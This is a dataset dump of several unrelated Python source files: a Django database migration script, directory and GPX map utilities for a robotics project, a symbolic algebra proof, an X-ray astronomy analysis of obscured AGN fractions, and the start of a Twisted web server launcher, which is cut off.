listing.save()\n listing_mapper[old_id] = str(listing.id)\n except Exception as e:\n logging.error('Error processing listing {0!s}: {1!s}'.format(title, str(e)))\n\n return listing_mapper\n\ndef migrate_application_library_entry(profile_mapper, listing_mapper):\n logging.debug('migrating application_library_entry...')\n columns = get_columns('application_library_entry')\n # ['id', 'version', 'created_by_id', 'created_date', 'edited_by_id', 'edited_date', 'folder', 'listing_id', 'owner_id', 'application_library_idx']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'created_by_id'\n assert columns[3] == 'created_date'\n assert columns[4] == 'edited_by_id'\n assert columns[5] == 'edited_date'\n assert columns[6] == 'folder'\n assert columns[7] == 'listing_id'\n assert columns[8] == 'owner_id'\n values = get_values('application_library_entry', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Application Library Entries to migrate: {0!s}'.format(len(values)))\n logging.info('==========================')\n for i in values:\n try:\n old_id = i[0]\n folder = i[6]\n listing_id = i[7]\n listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n owner = models.Profile.objects.get(id=profile_mapper[i[8]])\n logging.info('Adding application_library_entry for listing {0!s}, owner {1!s}'.format(listing.title, owner.user.username))\n entry = models.ApplicationLibraryEntry(folder=folder, listing=listing, owner=owner)\n entry.save()\n except Exception as e:\n logging.error('Error adding library entry: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_doc_url(listing_mapper):\n logging.debug('migrating doc_url...')\n columns = get_columns('doc_url')\n # ['id', 'version', 'listing_id', 'name', 'url']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'listing_id'\n assert columns[3] == 'name'\n assert columns[4] == 'url'\n values = get_values('doc_url', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Doc Urls to migrate: {0!s}'.format(len(values)))\n logging.info('==========================')\n for i in values:\n try:\n old_id = i[0]\n listing_id = i[2]\n name = i[3]\n url = i[4]\n listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n logging.info('Adding doc_url for listing {0!s}, name {1!s}'.format(listing.title, name))\n doc_url = models.DocUrl(name=name, url=url, listing=listing)\n doc_url.save()\n except Exception as e:\n logging.error('Error adding doc_url entry: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_item_comment(profile_mapper, listing_mapper):\n logging.debug('migrating item_comment...')\n columns = get_columns('item_comment')\n # ['id', 'version', 'listing_id', 'name', 'url']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'author_id'\n assert columns[3] == 'created_by_id'\n assert columns[4] == 'created_date'\n assert columns[5] == 'edited_by_id'\n assert columns[6] == 'edited_date'\n assert columns[7] == 'listing_id'\n assert columns[8] == 'rate'\n assert columns[9] == 'text'\n values = get_values('item_comment', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Reviews to migrate: {0!s}'.format(len(values)))\n logging.info('==========================')\n for i in values:\n try:\n old_id = i[0]\n listing = models.Listing.objects.get(id=listing_mapper[i[7]])\n author = models.Profile.objects.get(id=profile_mapper[i[2]])\n edited_date = get_date_from_str(i[6])\n rate = i[8]\n text = i[9]\n review = models.Review(text=text, rate=rate,\n edited_date=edited_date, author=author, listing=listing)\n logging.info('Adding review for listing {0!s}, rate: {1!s}, text: {2!s}'.format(listing.title, rate, text))\n review.save()\n except Exception as e:\n logging.error('Error adding review entry: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_iwc_data_object(profile_mapper):\n logging.debug('migrating iwc_data_object...')\n columns = get_columns('iwc_data_object')\n # ['id', 'version', 'content_type', 'entity', 'key', 'profile_id']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'content_type'\n assert columns[3] == 'entity'\n assert columns[4] == 'key'\n assert columns[5] == 'profile_id'\n values = get_values('iwc_data_object', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('IWC data objects to migrate: {0!s}'.format(len(values)))\n logging.info('==========================')\n for i in values:\n try:\n old_id = i[0]\n profile = models.Profile.objects.get(id=profile_mapper[i[5]])\n key = i[4]\n content_type = i[2]\n entity = i[3]\n # TODO: any modification here to match new api?\n data = iwc_models.DataResource(key=key, entity=entity,\n content_type=content_type, username=profile.user.username)\n logging.info('Adding iwc DataObject for user {0!s}, key: {1!s}, content_type: {2!s}'.format(\n profile.user.username, key, content_type))\n data.save()\n except Exception as e:\n logging.error('Error adding iwc DataObject entry: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_listing_category(listing_mapper, category_mapper):\n logging.debug('migrating listing_category...')\n columns = get_columns('listing_category')\n # ['listing_categories_id', 'category_id']\n assert columns[0] == 'listing_categories_id'\n assert columns[1] == 'category_id'\n values = get_values('listing_category', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('listing_category associations to migrate: {0!s}'.format(len(values)))\n logging.info('==========================')\n for i in values:\n try:\n listing_id = i[0]\n category_id = i[1]\n listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n category = models.Category.objects.get(id=category_mapper[category_id])\n logging.info('Adding category for listing {0!s}, name {1!s}'.format(listing.title, category.title))\n listing.categories.add(category)\n except Exception as e:\n logging.error('Error adding category {0!s} to listing: {1!s}, values: {2!s}'.format(category.title, listing.title, i))\n\ndef migrate_listing_profile(profile_mapper, listing_mapper):\n # owners\n logging.debug('migrating listing_profile...')\n columns = get_columns('listing_profile')\n # ['listing_owners_id', 'profile_id']\n assert columns[0] == 'listing_owners_id'\n assert columns[1] == 'profile_id'\n values = get_values('listing_profile', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('listing_profile associations to migrate: {0!s}'.format(len(values)))\n logging.info('==========================')\n for i in values:\n try:\n listing_id = i[0]\n profile_id = i[1]\n listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n profile = models.Profile.objects.get(id=profile_mapper[profile_id])\n logging.info('Adding owner for listing {0!s}, username {1!s}'.format(listing.title, profile.user.username))\n listing.owners.add(profile)\n except Exception as e:\n logging.error('Error adding owner {0!s} to listing: {1!s}, values: {2!s}'.format(profile.user.username, listing.title, i))\n\ndef migrate_listing_screenshot(listing_mapper):\n logging.debug('migrating screenshot...')\n columns = get_columns('screenshot')\n # ['id', 'version', 'listing_id', 'name', 'url']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'created_by_id'\n assert columns[3] == 'created_date'\n assert columns[4] == 'edited_by_id'\n assert columns[5] == 'edited_date'\n assert columns[6] == 'large_image_id'\n assert columns[7] == 'service_item_id'\n assert columns[8] == 'small_image_id'\n assert columns[9] == 'ordinal'\n values = get_values('screenshot', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Screenshots to migrate: {0!s}'.format(len(values)))\n logging.info('==========================')\n for i in values:\n try:\n old_id = i[0]\n large_image_id= i[6]\n small_image_id= i[8]\n listing_id = i[7]\n listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n small_image = migrate_image(small_image_id, 'small_screenshot')\n large_image = migrate_image(large_image_id, 'large_screenshot')\n logging.info('Adding screenshot for listing {0!s}, large_image_id {1!s}'.format(listing.title, large_image_id))\n screenshot = models.Screenshot(small_image=small_image, large_image=large_image, listing=listing)\n screenshot.save()\n except Exception as e:\n logging.error('Error adding screenshot entry: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_listing_tags(listing_mapper):\n logging.debug('migrating listing_tags...')\n columns = get_columns('listing_tags')\n # ['listing_id', 'tags_string']\n assert columns[0] == 'listing_id'\n assert columns[1] == 'tags_string'\n values = get_values('listing_tags', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Tags to migrate: {0!s}'.format(len(values)))\n logging.info('==========================')\n for i in values:\n try:\n listing_id = i[0]\n name = i[1]\n listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n try:\n tag = models.Tag(name=name)\n tag.save()\n except Exception:\n tag = models.Tag.objects.get(name=name)\n logging.info('Adding tag for listing {0!s}, name {1!s}'.format(listing.title, tag))\n listing.tags.add(tag)\n\n except Exception as e:\n logging.error('Error adding tag entry: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_contact(listing_mapper, contact_type_mapper):\n logging.debug('migrating contact...')\n columns = get_columns('contact')\n # ['id', 'version', 'created_by_id', 'created_date', 'edited_by_id', 'edited_date', 'email',\n # 'listing_id', 'name', 'organization', 'secure_phone', 'type_id', 'unsecure_phone']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'created_by_id'\n assert columns[3] == 'created_date'\n assert columns[4] == 'edited_by_id'\n assert columns[5] == 'edited_date'\n assert columns[6] == 'email'\n assert columns[7] == 'listing_id'\n assert columns[8] == 'name'\n assert columns[9] == 'organization'\n assert columns[10] == 'secure_phone'\n assert columns[11] == 'type_id'\n assert columns[12] == 'unsecure_phone'\n\n values = get_values('contact', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Contacts to migrate: {0!s}'.format(len(values)))\n logging.info('==========================')\n for i in values:\n try:\n email = i[6]\n listing_id = i[7]\n name = i[8]\n organization = i[9]\n secure_phone = i[10]\n type_id = i[11]\n contact_type = models.ContactType.objects.get(id=contact_type_mapper[type_id])\n unsecure_phone = i[12]\n listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n try:\n contact = models.Contact(name=name, email=email, secure_phone=secure_phone,\n unsecure_phone=unsecure_phone, contact_type=contact_type)\n contact.save()\n except Exception:\n logging.warning('Error: Found duplicate contact entry: {0!s}'.format(name))\n contact = models.Tag.objects.get(name=name)\n logging.info('Adding contact {0!s} for listing {1!s}'.format(name, listing.title))\n listing.contacts.add(contact)\n\n except Exception as e:\n logging.error('Error adding contact entry: {0!s}, values: {1!s}'.format(str(e), i))\n\ndef migrate_listing_activities(profile_mapper, listing_mapper):\n logging.debug('migrating listing_activity...')\n columns = get_columns('listing_activity')\n # ['id', 'version', 'created_by_id', 'created_date', 'edited_by_id', 'edited_date', 'email',\n # 'listing_id', 'name', 'organization', 'secure_phone', 'type_id', 'unsecure_phone']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'action'\n assert columns[3] == 'activity_date'\n assert columns[4] == 'author_id'\n assert columns[5] == 'created_by_id'\n assert columns[6] == 'created_date'\n assert columns[7] == 'edited_by_id'\n assert columns[8] == 'edited_date'\n assert columns[9] == 'listing_id'\n assert columns[10] == 'listing_activities_idx'\n values = get_values('listing_activity', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Listing Activities to migrate: {0!s}'.format(len(values)))\n listing_activity_mapper = {}\n logging.info('==========================')\n for i in values:\n try:\n old_id = i[0]\n action = i[2]\n author_id = i[4]\n listing_id = i[9]\n activity_date = get_date_from_str(i[8])\n author = models.Profile.objects.get(id=profile_mapper[author_id])\n listing = models.Listing.objects.get(id=listing_mapper[listing_id])\n logging.info('Adding listing_activity {0!s} for listing {1!s}'.format(action, listing.title))\n listing_activity = models.ListingActivity(action=action, activity_date=activity_date,\n author=author, listing=listing)\n listing_activity.save()\n listing_activity_mapper[old_id] = str(listing_activity.id)\n except Exception as e:\n logging.warning('Error adding listing_activity entry: {0!s}, values: {1!s}'.format(str(e), i))\n\n return listing_activity_mapper\n\ndef migrate_change_detail(listing_activity_mapper):\n logging.debug('migrating change_detail...')\n columns = get_columns('change_detail')\n # ['id', 'version', 'field_name', 'new_value', 'old_value', 'service_item_activity_id']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'field_name'\n assert columns[3] == 'new_value'\n assert columns[4] == 'old_value'\n assert columns[5] == 'service_item_activity_id'\n values = get_values('change_detail', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Change details to migrate: {0!s}'.format(len(values)))\n logging.info('==========================')\n for i in values:\n try:\n field_name = i[2]\n new_value = i[3]\n old_value = i[4]\n listing_activity_id = i[5]\n listing_activity = models.ListingActivity.objects.get(id=listing_activity_mapper[listing_activity_id])\n logging.info('Adding change_detail for listing {0!s}, field_name {1!s}'.format(listing_activity.listing.title, field_name))\n change_detail = models.ChangeDetail(field_name=field_name,\n old_value=old_value, new_value=new_value)\n change_detail.save()\n listing_activity.change_details.add(change_detail)\n except Exception as e:\n logging.warning('Error adding change_detail {0!s}, values: {1!s}'.format(field_name, i))\n\ndef migrate_rejection_data(listing_mapper, listing_activity_mapper):\n \"\"\"\n Set ListingActivity.description for all REJECTED activities\n \"\"\"\n logging.debug('getting data from rejection_activity...')\n columns = get_columns('rejection_activity')\n # ['id', 'rejection_listing_id']\n assert columns[0] == 'id'\n assert columns[1] == 'rejection_listing_id'\n rejection_activity_values = get_values('rejection_activity', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Rejection activities to migrate: {0!s}'.format(len(rejection_activity_values)))\n\n logging.debug('getting data from rejection_listing...')\n columns = get_columns('rejection_listing')\n # ['id', 'version', 'author_id', 'created_by_id', 'created_date', 'description',\n # 'edited_by_id', 'edited_date', 'service_item_id']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'author_id'\n assert columns[3] == 'created_by_id'\n assert columns[4] == 'created_date'\n assert columns[5] == 'description'\n assert columns[6] == 'edited_by_id'\n assert columns[7] == 'edited_date'\n assert columns[8] == 'service_item_id'\n rejection_listing_values = get_values('rejection_listing', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Rejection listings to migrate: {0!s}'.format(len(rejection_listing_values)))\n\n inverse_listing_activity_mapper = {v: k for k, v in listing_activity_mapper.items()}\n\n\n listing_activities = models.ListingActivity.objects.all()\n for activity in listing_activities:\n if activity.action == 'REJECTED':\n found_description = False\n try:\n logging.info('Found REJECTED action for listing {0!s}'.format(activity.listing.title))\n except Exception:\n logging.warning('Error: Found REJECTED action for non-existent listing')\n continue\n # find the corresponding rejection_activity\n old_listing_activity_id = inverse_listing_activity_mapper[str(activity.id)]\n for rejection_activity in rejection_activity_values:\n if rejection_activity[0] == old_listing_activity_id:\n for rejection_listing in rejection_listing_values:\n if rejection_listing[0] == rejection_activity[1]:\n description = rejection_listing[5]\n logging.info('Adding reason for rejection: {0!s}'.format(description))\n activity.description = description\n activity.save()\n found_description = True\n if not found_description:\n logging.warning('Error: Failed to find a description for a REJECTED activity')\n\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"db_migration/onetime_db_migration.py","file_name":"onetime_db_migration.py","file_ext":"py","file_size_in_byte":45292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"409759156","text":"\"\"\"\nContains functions that return important project directories\n\"\"\"\n\nimport os\nimport random\nimport sys\n\n# dictionary of important local project directories\nproject_dirs = {\n 'logs' : \"logs/\",\n 'maps' : \"maps/\",\n # 'pickled' : \"pickled/\",\n 'gpx' : \"maps/gpx/\",\n 'videos' : \"videos/\",\n 'images' : \"images/\",\n 'joysticks' : \"joysticks/\",\n # 'simulations': \"pickled/simulations/\",\n 'project' : \"\",\n}\n\n\ndef get_platform():\n \"\"\"Use for platform specific operations\"\"\"\n if sys.platform.startswith('darwin'): # OS X\n return \"mac\"\n elif (sys.platform.startswith('linux') or sys.platform.startswith(\n 'cygwin')):\n return \"linux\"\n elif sys.platform.startswith('win'): # Windows\n return \"windows\"\n else:\n return None\n\n\ndef interpret_dir(directory=\".\"):\n \"\"\"\n Search project_dirs and format the directory into an absolute\n directory. If the directory doesn't exist, make it\n\n A directory shortcut starts with \":\"\n For example:\n \":logs\" becomes \"[full path to]/logs/\"\n \":logs/Dec 27 2016\" becomes \"[full path to]/logs/Dec 27 2016/\"\n\n :return: Absolute path to directory\n \"\"\"\n if len(directory) > 0 and directory[0] == ':':\n shortcut_start = directory.find(\":\") + 1\n shortcut_end = directory.find(\"/\", shortcut_start)\n if shortcut_end == -1:\n key = directory[shortcut_start:]\n directory = project_dirs[key]\n else:\n key = directory[shortcut_start: shortcut_end]\n directory = os.path.join(project_dirs[key],\n directory[shortcut_end + 1:])\n\n abs_directory = os.path.abspath(directory)\n\n if not os.path.isdir(abs_directory):\n os.mkdir(abs_directory)\n\n return abs_directory\n\n\ndef parse_dir(directory, default, sort_fn=None):\n \"\"\"\n Formats the input directory using get_dir. The 'default' argument is the\n directory to start in. It should be a project directory flag. Useful if\n the user doesn't provide a specific directory but you know what kind of\n file in the project you are looking for.\n\n If :random is provided for the directory, a directory will selected at\n random from within the default directory\n \"\"\"\n if directory is None:\n directory = interpret_dir(default)\n elif directory == \":random\":\n directories = []\n for local_dir in os.listdir(interpret_dir(default)):\n directory = os.path.join(interpret_dir(default), local_dir)\n if os.path.isdir(directory):\n directories.append(directory)\n directory = random.choice(directories)\n print(\"Using directory '%s'\" % directory)\n\n elif type(directory) == int:\n directory = _get_dirs(interpret_dir(default), sort_fn)[directory]\n\n elif os.path.isdir(os.path.join(interpret_dir(default), directory)):\n directory = os.path.join(interpret_dir(default), directory)\n\n return directory\n\n\ndef _get_dirs(directory, sort_fn):\n local_dir = []\n directories = []\n contents = sorted(os.listdir(directory), key=lambda v: v.lower())\n for item in contents:\n full_dir = os.path.join(directory, item)\n if os.path.isdir(full_dir):\n local_dir.append(item)\n directories.append(full_dir)\n\n def internal_sort_fn(\n x): # hack to just use the first element in the zipped list\n return sort_fn(x[0])\n\n # sort full directory list in the order the local directory list is sorted\n directories = [full for (local, full) in\n sorted(zip(local_dir, directories), key=internal_sort_fn)]\n return directories\n\n\ndef _get_files(directory, file_types):\n \"\"\"\n Gets all file names of the specified file type in a directory\n file_types can be a list of file types or a string containing one file type\n \"\"\"\n if type(file_types) == str:\n file_types = [file_types]\n file_names = []\n contents = sorted(os.listdir(directory), key=lambda v: v.lower())\n for item in contents:\n for file_type in file_types:\n if item.endswith(file_type):\n file_names.append(item)\n return file_names\n\n\ndef get_file_name(file_name, directory, file_types):\n \"\"\"\n Gets a file within a directory. The file name can be the index of the file\n in the directory ordered by name, the name of the file, or a random file\n (specified by suppling :random for file_name).\n\n file_type is the desired file extension (for example: 'txt', 'avi')\n don't put in the '.' before the extension!!\n \"\"\"\n if type(file_name) == int:\n # file_name is the index in the list of files in the directory\n file_name = _get_files(directory, file_types)[file_name]\n elif type(file_name) == str:\n if file_name == \":random\":\n file_name = random.choice(_get_files(directory, file_types))\n elif type(file_types) == str:\n if not file_name.endswith(file_types):\n file_name += '.' + file_types\n else:\n raise ValueError(\"Invalid file name: \" + str(file_name))\n\n return file_name\n\n\ndef _get_gpx_map(file_name, directory):\n \"\"\"Parse a map from a GPX file\"\"\"\n with open(os.path.join(directory, file_name), 'r') as gpx_file:\n contents = gpx_file.read()\n\n gps_map = []\n\n # xml parsing. Extract the long and lat from the file\n start_flags = [' 1:\n if len(unparsed) == 2:\n lat_unparsed, long_unparsed = unparsed\n else:\n _, lat_unparsed, long_unparsed = unparsed\n\n lat = float(lat_unparsed[5:-1])\n long = float(long_unparsed[5:-10])\n\n gps_map.append((lat, long))\n\n return gps_map\n\n\ndef get_map(file_name, directory=None):\n \"\"\"\n Get a map as a list of tuples [(long0, lat0), (long1, lat1), ...].\n\n Two possible file types for maps are txt and gpx. You will either need\n to specify the :gpx or :maps directory, or give a file extension for the\n file name. If no directory and no file extension is given, gpx is assumed\n \"\"\"\n\n if directory is None:\n directory = \":maps\"\n\n directory = interpret_dir(directory)\n file_name = get_file_name(file_name, directory, 'gpx')\n gps_map = _get_gpx_map(file_name, directory)\n\n print(\"Using map named\", file_name)\n print(\"Length of map is\", len(gps_map))\n\n return gps_map\n\n\ndef parse_arguments(default_file=-1, default_directory=-1):\n file_name = default_file\n directory = default_directory\n\n if len(sys.argv) == 2:\n file_name = sys.argv[1]\n elif len(sys.argv) == 3:\n file_name, directory = sys.argv[1:]\n\n try:\n file_name = int(file_name)\n directory = int(directory)\n except ValueError:\n pass\n\n return file_name, directory\n","sub_path":"Atlasbuggy/atlasbuggy/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"142730052","text":"from util import *\n\n\n@apply\ndef apply(self):\n ((i, (j, S[i])), (S[j], S[j < i]), (S[0], S[True])), (S[j], S[0], n), (S[i], S[0], S[n]) = \\\n self.of(\n Lamda[\n Piecewise[ExprCondPair[Greater], \n ExprCondPair, \n ExprCondPair\n ]\n ])\n return Equal(self, (1 - Identity(n)) * Lamda[j:n, i:n](Min(i, j)))\n\n\n@prove\ndef prove(Eq):\n from axiom import algebra\n\n n = Symbol(integer=True, positive=True)\n i, j = Symbol(integer=True)\n Eq << apply(Lamda[j:n, i:n](Piecewise((i, j > i), (j, j < i), (0, True))))\n\n i, j = Symbol(domain=Range(n))\n Eq << algebra.eq.given.eq.getitem.apply(Eq[0], (i, j))\n\n Eq << Eq[-1].this.find(Min).apply(algebra.min.to.piece)\n\n Eq << Eq[-1].this.rhs.apply(algebra.mul.to.piece)\n\n Eq << Eq[-1].this.rhs.simplify(wrt=i)\n\n Eq << Eq[-1].this.find(LessEqual).reversed\n\n Eq << Eq[-1].this.find(KroneckerDelta).apply(algebra.kroneckerDelta.to.piece)\n\n Eq << Eq[-1].this.find(Mul[Piecewise]).apply(algebra.mul.to.piece, simplify=None)\n\n Eq << Eq[-1].this.find(Add[Piecewise]).apply(algebra.add.to.piece, simplify=False)\n\n Eq << Eq[-1].this.find(Mul[Piecewise]).apply(algebra.mul.to.piece, simplify=False)\n\n Eq << Eq[-1].this.rhs.apply(algebra.piece.flatten, index=0)\n\n Eq << Eq[-1].this.rhs.apply(algebra.piece.swap)\n\n Eq << Eq[-1].this.lhs.apply(algebra.piece.swap, -2)\n\n Eq << Eq[-1].this.lhs.apply(algebra.piece.invert, 0)\n\n Eq << Eq[-1].this.lhs.find(Equal).reversed\n\n \n \n\n\nif __name__ == '__main__':\n run()\n# created on 2019-10-18\n# updated on 2022-04-01\n","sub_path":"axiom/algebra/lamda_piece/to/mul/lamda/min.py","file_name":"min.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"140962858","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.io import fits\nimport sys\nfrom scipy.stats import kde\nimport matplotlib.gridspec as gridspec\nfrom collections import OrderedDict\nfrom matplotlib import colors\nfrom astropy.cosmology import FlatLambdaCDM\nfrom astropy import units as u\nimport seaborn as sns\nimport shapely.geometry as geom\n\ncosmo = FlatLambdaCDM(H0=70 * u.km / u.s / u.Mpc, Om0=0.3)\n\nwd='/Users/alberto/Desktop/XBOOTES/'\ndate = '200113'\np_any_cut=0.31\n\n# Open the matched master catalog (-cp version contains only one CDWFS source per line) \n# 6800 sources \n#cat=fits.open('/Users/alberto/Downloads/nway-master/cdwfs_I-Ks-3.6-cp.fits')\ncat=fits.open(wd+'CDWFS_I-Ks-3.6_v'+date+'.fits')\ndata=cat[1].data\ncols=cat[1].columns\nnames=cols.names\npany=data['p_any']\n\ncrf = data['CDWFS_CR_F']\nff = data['CDWFS_FLUX_F']\ncrs = data['CDWFS_CR_S']\nfs = data['CDWFS_FLUX_S']\ncrh = data['CDWFS_CR_H']\nfh = data['CDWFS_FLUX_H']\nhr0 = data['CDWFS_HR']\nehr0p = data['CDWFS_E_HR_+']\nehr0n = data['CDWFS_E_HR_-']\nzspec0=data['zsp']\nzph_g0=data['zph_G']\nchi_g0=data['chi2_G']\nzph_ga0=data['zph_G+A']\nchi_ga0=data['chi2_G+A']\nebv0=data['E_B-V']\nchi_s0=data['chi2_S']\n\n# Array of 6800 srcs\nz = np.full_like(zph_ga0,zph_ga0)\nztype = np.full_like(zph_ga0,0)\n\nz[(chi_g0 < chi_ga0) & (chi_g0!=-99)] = zph_g0[(chi_g0 < chi_ga0) & (chi_g0!=-99)]\nz[zspec0 != -99] = zspec0[zspec0 != -99]\nztype[zspec0 != -99] = 1\nztype[z==-99] = -99\nwhat=np.full_like(chi_g0,'A',dtype='str')\nwhat[(chi_g0p_any_cut]\nztype = ztype[pany>p_any_cut]\nfh = fh[pany>p_any_cut]\nfs = fs[pany>p_any_cut]\nnh = nh[pany>p_any_cut]\nks = ks[pany>p_any_cut]\nkh = kh[pany>p_any_cut]\nhr = hr0[pany>p_any_cut]\nwhat = what[pany>p_any_cut]\n\n# Cut for sources with redshift and NH\nmyz = z[ztype!=-99]\nmyfh = fh[ztype!=-99]\nmyfs = fs[ztype!=-99]\nmynh = nh[nh!=-99]\nmyks = ks[nh!=-99]\nmykh = kh[nh!=-99]\nmyhr = hr[nh!=-99]\nmywhat = what[ztype!=-99]\n\nprint(np.min(mynh),np.max(mynh))\nprint(np.min(myks),np.max(myks))\nprint(np.min(mykh),np.max(mykh))\n\nGAMMA = 1.8\nfh_int = myfh/mykh\nfs_int = myfs/myks\n\nfluxrestframe=myfh*(1+myz)**(GAMMA-2)\nfluxrestframe_int=fh_int*(1+myz)**(GAMMA-2)\ndl=cosmo.luminosity_distance(myz)\ndl2=dl.value*3.086e24 # from Mpc to cm\nlfull=4*3.141592*fluxrestframe*dl2**2\nlfull_int=4*3.141592*fluxrestframe_int*dl2**2\n\nlbins = np.logspace(41,46,12)\nzbins = np.logspace(-1,np.log10(5),15)\n\nobsc = mynh[mynh>=22]\nunob = mynh[mynh<22]\n\nz_obsc = myz[mynh>=22]\nz_unob = myz[mynh<22]\n\nl_obsc = lfull_int[mynh>=22]\nl_obsc_SM = lfull_int[myhr>-0.2] # As done by Stefano\nl_obsc_phot = lfull_int[mywhat=='G']\n\ntot,be=np.histogram(lfull_int,bins=lbins)\ntot_phot,be=np.histogram(lfull_int[(mywhat!='U') & (mywhat!='S')],bins=lbins)\n\nobs,be=np.histogram(l_obsc,bins=lbins)\nobs_SM,be=np.histogram(l_obsc_SM,bins=lbins)\nobs_phot,be0=np.histogram(l_obsc_phot,bins=lbins)\n\nbce = list((be[i+1]+be[i])/2. for i in range(len(be)-1))\n\nobsc_fraction = obs/tot\nobsc_fraction_SM = obs_SM/tot\nobsc_fraction_phot = obs_phot/tot_phot\n\nplt.figure()\nplt.plot(bce, obsc_fraction, 'c*',label='NH-HR')\nplt.plot(bce, obsc_fraction_SM, 'gD',label='HR cut')\nplt.plot(bce, obsc_fraction_phot, 'rs',label='Photometric classification')\n#plt.hist(l_obsc,bins=lbins,alpha=0.6,label='OBSCURED')\n#plt.hist(l_unob,bins=lbins,alpha=0.6,label='UNOBSCURED')\nplt.xscale('log')\nplt.legend()\nplt.axis([1e42,1e45,0,1])\nplt.show()\n\nsys.exit()\n\nzz=np.logspace(np.log10(1e-4),np.log10(5),100)\nflim=3e-15\nflimrestframe=flim*((1+zz)**(GAMMA-2))\ndl=cosmo.luminosity_distance(zz)\ndl2=dl.value*3.086e24 # from Mpc to cm\nl=flimrestframe*4*3.141592*dl2**2\n\n(x,y)=np.genfromtxt('/Users/alberto/Desktop/XBOOTES/aird_lstar_un.dat',unpack=True)\n(x2,y2)=np.genfromtxt('/Users/alberto/Desktop/XBOOTES/aird_lstar_ob.dat',unpack=True)\n\nlstar_un=10**(y)\nlstar_ob=10**(y2)\nz1=10**(x)-1\nz2=10**(x2)-1\n\nplt.figure(figsize=[7,7])\n\n#plt.plot(ztot[new==0],lfull[new==0],'.',color='tomato',zorder=-1,alpha=0.5)\n#plt.plot(ztot[new==1],lfull[new==1],'.',color='dodgerblue',alpha=0.5)\n#plt.plot(myz,lfull,'.',color='dodgerblue',alpha=0.5)\nplt.plot(myz,lfull_int,'.',color='tomato',alpha=0.5)\n\nplt.plot(zz,l,'k--')\n\nplt.plot(z1,lstar_un,color='lime',linestyle='dashed',linewidth=3,label='A15 Unobscured')\nplt.plot(z2,lstar_ob,color='yellow',linestyle='dashed',linewidth=3,label='A15 Obscured')\n#plt.xscale('log')\nplt.yscale('log')\nplt.xlabel('Redshift',fontsize=20)\nplt.ylabel(r'$L_{0.5-7}$ (erg/s)',fontsize=20)\nplt.axis([0.05,5,5e39,1e46])\nplt.tick_params(which='major',direction='inout',length=8,labelsize=15)\nplt.xticks(ticks=[0.1,1,2,3,4,5],labels=[0.1,1,2,3,4,5])\n#plt.annotate(r'$N=$'+str(len(ztot)),xy=(0.02,5e44))\nplt.legend(loc='lower right')\nplt.tight_layout()\nplt.show()\n","sub_path":"cdwfs_nh.py","file_name":"cdwfs_nh.py","file_ext":"py","file_size_in_byte":9152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"244737644","text":"\"\"\"\nRuns the glyphs server\n\"\"\"\nfrom contextlib import contextmanager\nimport os\nimport sys\n\nfrom codado.tx import Main\n\nfrom twisted.internet import reactor, endpoints, defer\nfrom twisted.python import log as tlog\nfrom twisted.web.server import Site\n\nfrom glyphs import db\nfrom glyphs.const import GLYPHS_DB_CONNECT\nfrom glyphs.server import Server\n\n\nLOG_DIR = './http'\nLOG_PATH = '%s/http-requests.log' % LOG_DIR\nDEFAULT_PORT = int(os.environ.get(\"PORT\")) if os.environ.get(\"PORT\") else 8080\n\n\nclass Run(Main):\n \"\"\"\n Command that runs the glyphs server\n \"\"\"\n synopsis = \"run\"\n\n callLater = reactor.callLater\n\n def postOptions(self):\n \"\"\"\n Start logging and run the webserver\n \"\"\"\n tlog.startLogging(sys.stdout)\n\n with createWeb() as webFactory:\n epWeb = endpoints.serverFromString(reactor, 'tcp:%s' % DEFAULT_PORT)\n dWeb = epWeb.listen(webFactory)\n\n def giveUp(f):\n f.printTraceback()\n self.callLater(0, reactor.stop)\n\n dl = defer.DeferredList([dWeb,], fireOnOneErrback=True).addErrback(giveUp)\n reactor.run()\n return dl\n\n\n@contextmanager\ndef createWeb():\n \"\"\"\n Create a factory for starting the website\n \"\"\"\n if not os.path.exists(LOG_DIR):\n 